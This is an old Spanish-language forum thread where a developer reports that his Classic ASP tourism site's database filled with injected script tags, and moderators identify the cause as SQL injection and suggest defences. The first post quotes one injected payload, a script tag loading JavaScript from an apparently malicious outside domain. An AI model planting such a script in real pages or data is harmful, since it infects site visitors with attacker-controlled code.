Foros del Web » Programando para Internet » ASP Clásico »

Necesito Opinión: Mi aplicación ASP se lleno de scripts maliciosos

Estas en el tema de Necesito Opinión: Mi aplicación ASP se lleno de scripts maliciosos en el foro de ASP Clásico en Foros del Web. Hola amigos del foro les comento mi historia Hace unos 5 años cuando era joven, desarrolle un portal de turismo con ASP y SQL SERVER ...
  #1 (permalink)  
Antiguo 01/10/2008, 22:25
 
Fecha de Ingreso: julio-2007
Mensajes: 22
Antigüedad: 16 años, 10 meses
Puntos: 1
Necesito Opinión: Mi aplicación ASP se lleno de scripts maliciosos

Hola amigos del foro les comento mi historia

Hace unos 5 años cuando era joven, desarrolle un portal de turismo con ASP y SQL SERVER 2000. El sitio ha estado funcionando bien pero el mes de Julio me di cuenta que en las tablas hay scripts maliciosos como este:

CASA DEL SUIZO<script src=http<script src=http://www.heiheinn.cn/k.js></script>

Y fue insertando y borrando en los campos de la bd, tengo alrededor de 80 tablas ya que manejaba un gran número de información. Actualmente el sitio se encuentra en la lista de sitios maliciosos de Google.

Como este sitio lo maneja un cliente y he dejado de dar soporte hace algún tiempo no tengo backups de la base de datos y tendré que usar algún respaldo cuando comenze con ese trabajo.

Mis preguntas son:
¿Como diablos se pudo insertar ese código en mi base de datos, culpa del hosting o mismo de la tecnología ?
¿Como puedo sacar de la lista de maliciosos de Google?
¿Ha tenido alguna vez un problema de este tipo?

Gracias por sus comentarios

Saludos
Globerubi
  #2 (permalink)  
Antiguo 01/10/2008, 22:37
Avatar de u_goldman
Moderador
 
Fecha de Ingreso: enero-2002
Mensajes: 8.031
Antigüedad: 22 años, 5 meses
Puntos: 98
Respuesta: Necesito Opinión: Mi aplicación ASP se lleno de scripts maliciosos

Cita:
Iniciado por globerubi Ver Mensaje

Mis preguntas son:
¿Como diablos se pudo insertar ese código en mi base de datos, culpa del hosting o mismo de la tecnología ?
¿Como puedo sacar de la lista de maliciosos de Google?
¿Ha tenido alguna vez un problema de este tipo?
  • Se llama SQL Injection, se ha hablado muchas veces de esto en el foro, en realidad no te va a gustar leerlo, pero no es culpa de nadie mas que tuya.
  • NPI
  • Si...creo que después de desarrollar por un tiempo en algún momento todos nos hemos enfrentado a un ataque de SQL Injection máxime que existen los famosos SQL worms que son autómatas encargados de envíar esas inyecciones, y se valen del descuido de los desarrolladores al programar sentencias dinámicas para inyectar el contenido dinámico.

Hazte una búsqueda, vas a encontrar varias cosas al respecto, de lo que se trata es de controlar las sentencias dinámicas, ahora si esto no es posible dada la magnitud del sistema podrías crear dependiendo de las entradas de tu sistema, permisos especiales a usuarios de SQL, de tal manera que si no es necesario que se inserten datos desde el front, tu aplicación utilice un usuario SQL de solo lectura, hay varias cosas que se pueden hacer, pero todo depende del contexto.

Saludos
__________________
"El hombre que ha empezado a vivir seriamente por dentro, empieza a vivir más sencillamente por fuera."
-- Ernest Hemingway
  #3 (permalink)  
Antiguo 01/10/2008, 22:41
Avatar de u_goldman
Moderador
 
Fecha de Ingreso: enero-2002
Mensajes: 8.031
Antigüedad: 22 años, 5 meses
Puntos: 98
Respuesta: Necesito Opinión: Mi aplicación ASP se lleno de scripts maliciosos

Agh, moví el tema equivocadamente...esto pertenece al foro de ASP
__________________
"El hombre que ha empezado a vivir seriamente por dentro, empieza a vivir más sencillamente por fuera."
-- Ernest Hemingway
  #4 (permalink)  
Antiguo 02/10/2008, 09:50
Avatar de RootK
Moderador
 
Fecha de Ingreso: febrero-2002
Ubicación: México D.F
Mensajes: 8.004
Antigüedad: 22 años, 4 meses
Puntos: 50
Respuesta: Necesito Opinión: Mi aplicación ASP se lleno de scripts maliciosos

de regreso jeje

movido desde foro de programacion
__________________
Nadie roba nada ya que en la vida todo se paga . . .

Exentrit - Soluciones SharePoint & Net
  #5 (permalink)  
Antiguo 03/10/2008, 14:48
 
Fecha de Ingreso: febrero-2008
Mensajes: 578
Antigüedad: 16 años, 3 meses
Puntos: 3
Respuesta: Necesito Opinión: Mi aplicación ASP se lleno de scripts maliciosos

algo parecido pasó una vez en la empresa de un amigo,
investigando en internet, descubrió que el problema era de ASP, en la forma de conectarse a la base de datos, la cual dejaba algo abierto para que se te metan.

investigá en la conexion a la base de datos, mas no te puedo decir porque no me pasó, pero lo sé por un amigo.
  #6 (permalink)  
Antiguo 03/10/2008, 21:34
Avatar de u_goldman
Moderador
 
Fecha de Ingreso: enero-2002
Mensajes: 8.031
Antigüedad: 22 años, 5 meses
Puntos: 98
Respuesta: Necesito Opinión: Mi aplicación ASP se lleno de scripts maliciosos

Cita:
Iniciado por Jamati Ver Mensaje
algo parecido pasó una vez en la empresa de un amigo,
investigando en internet, descubrió que el problema era de ASP, en la forma de conectarse a la base de datos, la cual dejaba algo abierto para que se te metan.

investigá en la conexion a la base de datos, mas no te puedo decir porque no me pasó, pero lo sé por un amigo.
Mmmmhhhh...Jamati: El problema es un descuido del programador, y se puede resolver a distintos niveles, tiene algo de cierto lo que dices con la base de datos, si por ejemplo tenemos la precacución de asignar permisos específicos al usuario que se conecta en el front end de tu aplicación, pero en general es por no controlar adecuadamente las variables concatenadas a las sentencias SQL, por aca tocamos el tema mas profundamente.

Saludos
__________________
"El hombre que ha empezado a vivir seriamente por dentro, empieza a vivir más sencillamente por fuera."
-- Ernest Hemingway
  #7 (permalink)  
Antiguo 03/10/2008, 22:27
 
Fecha de Ingreso: febrero-2008
Mensajes: 578
Antigüedad: 16 años, 3 meses
Puntos: 3
Respuesta: Necesito Opinión: Mi aplicación ASP se lleno de scripts maliciosos

Gracias por la aclaración u_goldman.

Saludos
  #8 (permalink)  
Antiguo 04/10/2008, 20:11
Avatar de chwc  
Fecha de Ingreso: julio-2008
Ubicación: Buenos Aires ! :D
Mensajes: 814
Antigüedad: 15 años, 10 meses
Puntos: 103
Respuesta: Necesito Opinión: Mi aplicación ASP se lleno de scripts maliciosos

mira aqui:
http://safebrowsing.clients.google.c...te=heiheinn.cn
ahi informa google que heiheinn.cn infecto a 290 sitios web entre otras cosas
  #9 (permalink)  
Antiguo 06/10/2008, 14:51
Avatar de Myakire
Colaborador
 
Fecha de Ingreso: enero-2002
Ubicación: Centro de la república
Mensajes: 8.849
Antigüedad: 22 años, 4 meses
Puntos: 146
Respuesta: Necesito Opinión: Mi aplicación ASP se lleno de scripts maliciosos

Cita:
Iniciado por u_goldman Ver Mensaje
  • Se llama SQL Injection, se ha hablado muchas veces de esto en el foro, en realidad no te va a gustar leerlo, pero no es culpa de nadie mas que tuya.
    ....
Efectivamente, no le gustó leerlo ya que no regresó
Atención: Estás leyendo un tema que no tiene actividad desde hace más de 6 MESES, te recomendamos abrir un Nuevo tema en lugar de responder al actual.
Respuesta




La zona horaria es GMT -6. Ahora son las 01:04.